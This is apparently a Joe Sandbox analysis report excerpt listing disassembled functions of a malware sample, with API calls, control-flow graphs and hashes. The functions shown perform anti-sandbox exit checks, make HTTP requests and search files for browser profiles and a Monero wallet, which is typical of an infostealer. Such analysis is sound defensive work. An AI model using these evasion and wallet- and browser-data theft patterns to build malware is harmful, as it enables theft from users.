                        • Sleep.KERNEL32(0000EA60), ref: 00E35A1B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen$Sleep
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 507064821-2791005934
                        • Opcode ID: 9fde37c438289dc8a6b5bd4d31f8343f24978bf7802f228af619a214e2b03acb
                        • Instruction ID: f8921478af1e15c0c00597649b679dcdc4ac9b12a108fc5325fe2bbe1d6c9810
                        • Opcode Fuzzy Hash: 9fde37c438289dc8a6b5bd4d31f8343f24978bf7802f228af619a214e2b03acb
                        • Instruction Fuzzy Hash: E5E15372910104AACB18FBB0EC9EAED7BB8AF54300F449178F44677195EF356B49CB92

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1301 e317a0-e317cd call e3aad0 StrCmpCA 1304 e317d7-e317f1 call e3aad0 1301->1304 1305 e317cf-e317d1 ExitProcess 1301->1305 1309 e317f4-e317f8 1304->1309 1310 e319c2-e319cd call e3a800 1309->1310 1311 e317fe-e31811 1309->1311 1313 e31817-e3181a 1311->1313 1314 e3199e-e319bd 1311->1314 1316 e31821-e31830 call e3a820 1313->1316 1317 e31849-e31858 call e3a820 1313->1317 1318 e318cf-e318e0 StrCmpCA 1313->1318 1319 e3198f-e31999 call e3a820 1313->1319 1320 e318ad-e318be StrCmpCA 1313->1320 1321 e31913-e31924 StrCmpCA 1313->1321 1322 e31932-e31943 StrCmpCA 1313->1322 1323 e318f1-e31902 StrCmpCA 1313->1323 1324 e31951-e31962 StrCmpCA 1313->1324 1325 e31970-e31981 StrCmpCA 1313->1325 1326 e31835-e31844 call e3a820 1313->1326 1327 e3187f-e31890 StrCmpCA 1313->1327 1328 e3185d-e3186e StrCmpCA 1313->1328 1314->1309 1316->1314 1317->1314 1342 e318e2-e318e5 1318->1342 1343 e318ec 1318->1343 1319->1314 1340 e318c0-e318c3 1320->1340 1341 e318ca 1320->1341 1346 e31930 1321->1346 1347 e31926-e31929 1321->1347 1348 e31945-e31948 1322->1348 1349 e3194f 1322->1349 1344 e31904-e31907 1323->1344 1345 e3190e 1323->1345 1350 e31964-e31967 1324->1350 1351 e3196e 1324->1351 1330 e31983-e31986 1325->1330 1331 e3198d 1325->1331 1326->1314 1338 e31892-e3189c 1327->1338 1339 e3189e-e318a1 1327->1339 1336 e31870-e31873 1328->1336 1337 e3187a 1328->1337 1330->1331 1331->1314 1336->1337 1337->1314 1355 e318a8 1338->1355 1339->1355 1340->1341 1341->1314 1342->1343 1343->1314 1344->1345 1345->1314 1346->1314 1347->1346 1348->1349 1349->1314 1350->1351 1351->1314 1355->1314
                        APIs
                        • StrCmpCA.SHLWAPI(00000000,block), ref: 00E317C5
                        • ExitProcess.KERNEL32 ref: 00E317D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: dfefdae90e9f1dfdeaee967dc3d31f0b80d36a7ac1cc1f4defd61e246b179529
                        • Instruction ID: a886701c6fe0b39634e678960dc738cea91a2efd0582a778def6201d22faf79f
                        • Opcode Fuzzy Hash: dfefdae90e9f1dfdeaee967dc3d31f0b80d36a7ac1cc1f4defd61e246b179529
                        • Instruction Fuzzy Hash: 505169B4A04209EFCB04DFA4D958BBE7BB5BF88304F10A09CE946B7240D775E955CB61

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1356 e37500-e3754a GetWindowsDirectoryA 1357 e37553-e375c7 GetVolumeInformationA call e38d00 * 3 1356->1357 1358 e3754c 1356->1358 1365 e375d8-e375df 1357->1365 1358->1357 1366 e375e1-e375fa call e38d00 1365->1366 1367 e375fc-e37617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 e37619-e37626 call e3a740 1367->1369 1370 e37628-e37658 wsprintfA call e3a740 1367->1370 1377 e3767e-e3768e 1369->1377 1370->1377
                        APIs
                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00E37542
                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E3757F
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E37603
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E3760A
                        • wsprintfA.USER32 ref: 00E37640
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                        • String ID: :$C$\$
                        • API String ID: 1544550907-3109660283
                        • Opcode ID: c5d97c22a38989401972494ebe30a944645ac99cce6f7a42e110096182916bb3
                        • Instruction ID: c1597eaff42d71f7d0f7d5276a94019f165531c459577eca2e126444deafea0e
                        • Opcode Fuzzy Hash: c5d97c22a38989401972494ebe30a944645ac99cce6f7a42e110096182916bb3
                        • Instruction Fuzzy Hash: 6B4192F1E04248EBDB20DF94DC49BDEBBB8AF48704F100199F54977280D7796A44CBA5

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00E39860: GetProcAddress.KERNEL32(76210000,01961748), ref: 00E398A1
                          • Part of subcall function 00E39860: GetProcAddress.KERNEL32(76210000,01961568), ref: 00E398BA
                          • Part of subcall function 00E39860: GetProcAddress.KERNEL32(76210000,019615C8), ref: 00E398D2
                          • Part of subcall function 00E39860: GetProcAddress.KERNEL32(76210000,019615E0), ref: 00E398EA
                          • Part of subcall function 00E39860: GetProcAddress.KERNEL32(76210000,01961538), ref: 00E39903
                          • Part of subcall function 00E39860: GetProcAddress.KERNEL32(76210000,019689F0), ref: 00E3991B
                          • Part of subcall function 00E39860: GetProcAddress.KERNEL32(76210000,01956718), ref: 00E39933
                          • Part of subcall function 00E39860: GetProcAddress.KERNEL32(76210000,01956498), ref: 00E3994C
                          • Part of subcall function 00E39860: GetProcAddress.KERNEL32(76210000,019615F8), ref: 00E39964
                          • Part of subcall function 00E39860: GetProcAddress.KERNEL32(76210000,019616D0), ref: 00E3997C
                          • Part of subcall function 00E39860: GetProcAddress.KERNEL32(76210000,019615B0), ref: 00E39995
                          • Part of subcall function 00E39860: GetProcAddress.KERNEL32(76210000,01961760), ref: 00E399AD
                          • Part of subcall function 00E39860: GetProcAddress.KERNEL32(76210000,01956678), ref: 00E399C5
                          • Part of subcall function 00E39860: GetProcAddress.KERNEL32(76210000,019617A8), ref: 00E399DE
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E211D0: ExitProcess.KERNEL32 ref: 00E21211
                          • Part of subcall function 00E21160: GetSystemInfo.KERNEL32(?), ref: 00E2116A
                          • Part of subcall function 00E21160: ExitProcess.KERNEL32 ref: 00E2117E
                          • Part of subcall function 00E21110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E2112B
                          • Part of subcall function 00E21110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00E21132
                          • Part of subcall function 00E21110: ExitProcess.KERNEL32 ref: 00E21143
                          • Part of subcall function 00E21220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00E2123E
                          • Part of subcall function 00E21220: __aulldiv.LIBCMT ref: 00E21258
                          • Part of subcall function 00E21220: __aulldiv.LIBCMT ref: 00E21266
                          • Part of subcall function 00E21220: ExitProcess.KERNEL32 ref: 00E21294
                          • Part of subcall function 00E36770: GetUserDefaultLangID.KERNEL32 ref: 00E36774
                          • Part of subcall function 00E21190: ExitProcess.KERNEL32 ref: 00E211C6
                          • Part of subcall function 00E37850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E211B7), ref: 00E37880
                          • Part of subcall function 00E37850: RtlAllocateHeap.NTDLL(00000000), ref: 00E37887
                          • Part of subcall function 00E37850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E3789F
                          • Part of subcall function 00E378E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E37910
                          • Part of subcall function 00E378E0: RtlAllocateHeap.NTDLL(00000000), ref: 00E37917
                          • Part of subcall function 00E378E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00E3792F
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01968A00,?,00E4110C,?,00000000,?,00E41110,?,00000000,00E40AEF), ref: 00E36ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E36AE8
                        • CloseHandle.KERNEL32(00000000), ref: 00E36AF9
                        • Sleep.KERNEL32(00001770), ref: 00E36B04
                        • CloseHandle.KERNEL32(?,00000000,?,01968A00,?,00E4110C,?,00000000,?,00E41110,?,00000000,00E40AEF), ref: 00E36B1A
                        • ExitProcess.KERNEL32 ref: 00E36B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                        • String ID:
                        • API String ID: 2525456742-0
                        • Opcode ID: a5bb6193160e40ee902c480c7129ef953d41677f970da572d70019541d27f068
                        • Instruction ID: a510153ad37d3a4aaa188eba49bda1377556b008bebb11188577bb8441e15921
                        • Opcode Fuzzy Hash: a5bb6193160e40ee902c480c7129ef953d41677f970da572d70019541d27f068
                        • Instruction Fuzzy Hash: 6A314571900218ABDB14F7F0EC5EBEE7BB8AF54340F046568F282B6191DF745A45C7A2

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1436 e21220-e21247 call e389b0 GlobalMemoryStatusEx 1439 e21273-e2127a 1436->1439 1440 e21249-e21271 call e3da00 * 2 1436->1440 1441 e21281-e21285 1439->1441 1440->1441 1443 e21287 1441->1443 1444 e2129a-e2129d 1441->1444 1446 e21292-e21294 ExitProcess 1443->1446 1447 e21289-e21290 1443->1447 1447->1444 1447->1446
                        APIs
                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00E2123E
                        • __aulldiv.LIBCMT ref: 00E21258
                        • __aulldiv.LIBCMT ref: 00E21266
                        • ExitProcess.KERNEL32 ref: 00E21294
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                        • String ID: @
                        • API String ID: 3404098578-2766056989
                        • Opcode ID: e581ff8799953484237cc6263798194adbc5141fb792beab7fa52c91609df94d
                        • Instruction ID: 12c2d31bb9cfb255eaec52ac41c19fc09b8fca255555f8a7c97d1f6b0181b5ae
                        • Opcode Fuzzy Hash: e581ff8799953484237cc6263798194adbc5141fb792beab7fa52c91609df94d
                        • Instruction Fuzzy Hash: 16016DB1D44308FAEB10EBE0ED49B9EBBB8FB14705F209488F705B62D0D77856419799

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1450 e36af3 1451 e36b0a 1450->1451 1453 e36aba-e36ad7 call e3aad0 OpenEventA 1451->1453 1454 e36b0c-e36b22 call e36920 call e35b10 CloseHandle ExitProcess 1451->1454 1460 e36af5-e36b04 CloseHandle Sleep 1453->1460 1461 e36ad9-e36af1 call e3aad0 CreateEventA 1453->1461 1460->1451 1461->1454
                        APIs
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01968A00,?,00E4110C,?,00000000,?,00E41110,?,00000000,00E40AEF), ref: 00E36ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E36AE8
                        • CloseHandle.KERNEL32(00000000), ref: 00E36AF9
                        • Sleep.KERNEL32(00001770), ref: 00E36B04
                        • CloseHandle.KERNEL32(?,00000000,?,01968A00,?,00E4110C,?,00000000,?,00E41110,?,00000000,00E40AEF), ref: 00E36B1A
                        • ExitProcess.KERNEL32 ref: 00E36B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                        • String ID:
                        • API String ID: 941982115-0
                        • Opcode ID: a50c6951b0f2c0b796dd1ef0da5f643b862513a89bea260f4416fb8207faf3e2
                        • Instruction ID: 8c76b7985bd14e49f52c28c09beba4ad4bd1e7285a8ed921a90885400d83deff
                        • Opcode Fuzzy Hash: a50c6951b0f2c0b796dd1ef0da5f643b862513a89bea260f4416fb8207faf3e2
                        • Instruction Fuzzy Hash: 6EF03A30A40209FEEB20BBB09C1EBBDBFB4FB04701F10A514F543B6181CBB55540DA55

                        Control-flow Graph

                        APIs
                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E24839
                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00E24849
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CrackInternetlstrlen
                        • String ID: <
                        • API String ID: 1274457161-4251816714
                        • Opcode ID: e9b242cb94fbc733dee322edbf7c0fb4468673b919325cd2e591cf308ff3ee66
                        • Instruction ID: c88a44fa0a6e3b20c9857db1e8451270d20dbb00de480e42df522cf664ab1aa6
                        • Opcode Fuzzy Hash: e9b242cb94fbc733dee322edbf7c0fb4468673b919325cd2e591cf308ff3ee66
                        • Instruction Fuzzy Hash: A2214FB1D00209ABDF14DFA4E849ADE7BB5FB44320F108625F955B72C0EB746A09CF81

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00E3A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E3A7E6
                          • Part of subcall function 00E26280: InternetOpenA.WININET(00E40DFE,00000001,00000000,00000000,00000000), ref: 00E262E1
                          • Part of subcall function 00E26280: StrCmpCA.SHLWAPI(?,0196FA58), ref: 00E26303
                          • Part of subcall function 00E26280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E26335
                          • Part of subcall function 00E26280: HttpOpenRequestA.WININET(00000000,GET,?,0196F4B0,00000000,00000000,00400100,00000000), ref: 00E26385
                          • Part of subcall function 00E26280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E263BF
                          • Part of subcall function 00E26280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E263D1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E35228
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                        • String ID: ERROR$ERROR
                        • API String ID: 3287882509-2579291623
                        • Opcode ID: 91c7c1e87393e820e5938c5049629b87cf97acd3804d66e9494567a9970c62f4
                        • Instruction ID: 51201705b3b4c5a38dd53ed8d0bdc0a43d3f7fa6b625d8005395b4b836c84ed0
                        • Opcode Fuzzy Hash: 91c7c1e87393e820e5938c5049629b87cf97acd3804d66e9494567a9970c62f4
                        • Instruction Fuzzy Hash: 46113331910148ABCB18FF64DD9AAED7BB8AF50300F4451A8F84A77192EF306B45C691
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E2112B
                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 00E21132
                        • ExitProcess.KERNEL32 ref: 00E21143
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$AllocCurrentExitNumaVirtual
                        • String ID:
                        • API String ID: 1103761159-0
                        • Opcode ID: 94329f304fe8cb404b326370327f47691a95036886e07b4fb717c76558982000
                        • Instruction ID: 3ca84a70ce7bf99813c5be0ccad83b7082757ff8b4d18eac1e6dd441a1e6b8d0
                        • Opcode Fuzzy Hash: 94329f304fe8cb404b326370327f47691a95036886e07b4fb717c76558982000
                        • Instruction Fuzzy Hash: 76E0E670A45308FFE7207BA0AC0AF0976B8AB04B05F105095F709771D4D6B926409799
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00E210B3
                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00E210F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Virtual$AllocFree
                        • String ID:
                        • API String ID: 2087232378-0
                        • Opcode ID: c0c89f757cb3d553bff01fc850b90dd438513d101ca93329d0760ce63f0b2c25
                        • Instruction ID: 18ba0bbbce401c61d324b55fa0e26ca2331d6f51e6aee72c45b023a10f7aab7b
                        • Opcode Fuzzy Hash: c0c89f757cb3d553bff01fc850b90dd438513d101ca93329d0760ce63f0b2c25
                        • Instruction Fuzzy Hash: 9EF0E271641318BBE714AAA4AC49FABB7E8E705B15F302448F544F3280D572AF00CBA0
                        APIs
                          • Part of subcall function 00E378E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E37910
                          • Part of subcall function 00E378E0: RtlAllocateHeap.NTDLL(00000000), ref: 00E37917
                          • Part of subcall function 00E378E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00E3792F
                          • Part of subcall function 00E37850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E211B7), ref: 00E37880
                          • Part of subcall function 00E37850: RtlAllocateHeap.NTDLL(00000000), ref: 00E37887
                          • Part of subcall function 00E37850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E3789F
                        • ExitProcess.KERNEL32 ref: 00E211C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                        • String ID:
                        • API String ID: 3550813701-0
                        • Opcode ID: d9f5d5b86cc9641ac56240f37dce94cc2b1ef3380d6de2014fded8860ab13c9e
                        • Instruction ID: cdb6c5e3579a8898c77c6f3fe25591272e2ae433b8a385a72f739d18f092e208
                        • Opcode Fuzzy Hash: d9f5d5b86cc9641ac56240f37dce94cc2b1ef3380d6de2014fded8860ab13c9e
                        • Instruction Fuzzy Hash: E4E012B5A1431997CA2473B4BD0EB2A3ADC5B64349F042425FA85F3112FA6AF910C665
                        APIs
                        • wsprintfA.USER32 ref: 00E338CC
                        • FindFirstFileA.KERNEL32(?,?), ref: 00E338E3
                        • lstrcat.KERNEL32(?,?), ref: 00E33935
                        • StrCmpCA.SHLWAPI(?,00E40F70), ref: 00E33947
                        • StrCmpCA.SHLWAPI(?,00E40F74), ref: 00E3395D
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E33C67
                        • FindClose.KERNEL32(000000FF), ref: 00E33C7C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                        • API String ID: 1125553467-2524465048
                        • Opcode ID: dfdac2a981e829b533f1a08b9277a24ab650931578cf6437ce0eaaef26a2204e
                        • Instruction ID: 827269d76c567fabc69bb9a12abdc5781a10d348fa25061016160dd67b24bd17
                        • Opcode Fuzzy Hash: dfdac2a981e829b533f1a08b9277a24ab650931578cf6437ce0eaaef26a2204e
                        • Instruction Fuzzy Hash: A2A130B1A002189BDB34EB64DC89FEA77B8BB88300F045598F64DA7145EB759B84CF61
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                        • FindFirstFileA.KERNEL32(00000000,?,00E40B32,00E40B2B,00000000,?,?,?,00E413F4,00E40B2A), ref: 00E2BEF5
                        • StrCmpCA.SHLWAPI(?,00E413F8), ref: 00E2BF4D
                        • StrCmpCA.SHLWAPI(?,00E413FC), ref: 00E2BF63
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E2C7BF
                        • FindClose.KERNEL32(000000FF), ref: 00E2C7D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                        • API String ID: 3334442632-726946144
                        • Opcode ID: 88677bd34c376a8d88b063982af0704d88577df33793096a19feacf2feebe512
                        • Instruction ID: ba032e4850b359891abd7ad1c709d4e2ce5263a293845474053e54b48ba1233f
                        • Opcode Fuzzy Hash: 88677bd34c376a8d88b063982af0704d88577df33793096a19feacf2feebe512
                        • Instruction Fuzzy Hash: 2B426672900104ABCB14FB70DD9AEED77BCAF94300F4455A9F546B7181EE34AB89CB92
                        APIs
                        • wsprintfA.USER32 ref: 00E3492C
                        • FindFirstFileA.KERNEL32(?,?), ref: 00E34943
                        • StrCmpCA.SHLWAPI(?,00E40FDC), ref: 00E34971
                        • StrCmpCA.SHLWAPI(?,00E40FE0), ref: 00E34987
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E34B7D
                        • FindClose.KERNEL32(000000FF), ref: 00E34B92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s$%s\%s$%s\*
                        • API String ID: 180737720-445461498
                        • Opcode ID: 58c83166298e3ec8c864942a7a78b867b12e9459559b24ef99f1584972f9dbd0
                        • Instruction ID: 4efdcb2e62b0e293f5d9e3991e94f8fa99d1c510ed1e1af91c12f290f491f4a0
                        • Opcode Fuzzy Hash: 58c83166298e3ec8c864942a7a78b867b12e9459559b24ef99f1584972f9dbd0
                        • Instruction Fuzzy Hash: 776159B1600214ABCB34EBA0EC49FEA77BCBB48700F044598F649B6145EB75EB45CF91
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00E34580
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E34587
                        • wsprintfA.USER32 ref: 00E345A6
                        • FindFirstFileA.KERNEL32(?,?), ref: 00E345BD
                        • StrCmpCA.SHLWAPI(?,00E40FC4), ref: 00E345EB
                        • StrCmpCA.SHLWAPI(?,00E40FC8), ref: 00E34601
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E3468B
                        • FindClose.KERNEL32(000000FF), ref: 00E346A0
                        • lstrcat.KERNEL32(?,0196FAF8), ref: 00E346C5
                        • lstrcat.KERNEL32(?,0196E538), ref: 00E346D8
                        • lstrlen.KERNEL32(?), ref: 00E346E5
                        • lstrlen.KERNEL32(?), ref: 00E346F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                        • String ID: %s\%s$%s\*
                        • API String ID: 671575355-2848263008
                        • Opcode ID: cb2c474a81f81bc43bd9cbda371e2e62f571a2f06c0ab69401a694da5315cf95
                        • Instruction ID: e83eb3cbc333eed2c8e6c7ff760fcacef6d533618fd415952847ba28bb7fe9b4
                        • Opcode Fuzzy Hash: cb2c474a81f81bc43bd9cbda371e2e62f571a2f06c0ab69401a694da5315cf95
                        • Instruction Fuzzy Hash: 535145B1640218ABC724FB70DC89FE9777CAB58300F405598F649B2194EB799B84CF91
                        APIs
                        • wsprintfA.USER32 ref: 00E33EC3
                        • FindFirstFileA.KERNEL32(?,?), ref: 00E33EDA
                        • StrCmpCA.SHLWAPI(?,00E40FAC), ref: 00E33F08
                        • StrCmpCA.SHLWAPI(?,00E40FB0), ref: 00E33F1E
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E3406C
                        • FindClose.KERNEL32(000000FF), ref: 00E34081
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s
                        • API String ID: 180737720-4073750446
                        • Opcode ID: de14f62c0862e157c18eb24b00989fe5dfebd63087b63a9e23c9ad4d94914929
                        • Instruction ID: fbbc8a6d877f75a2d541367b40b0c3b12c8399c1ebf89a2246d66d194a970193
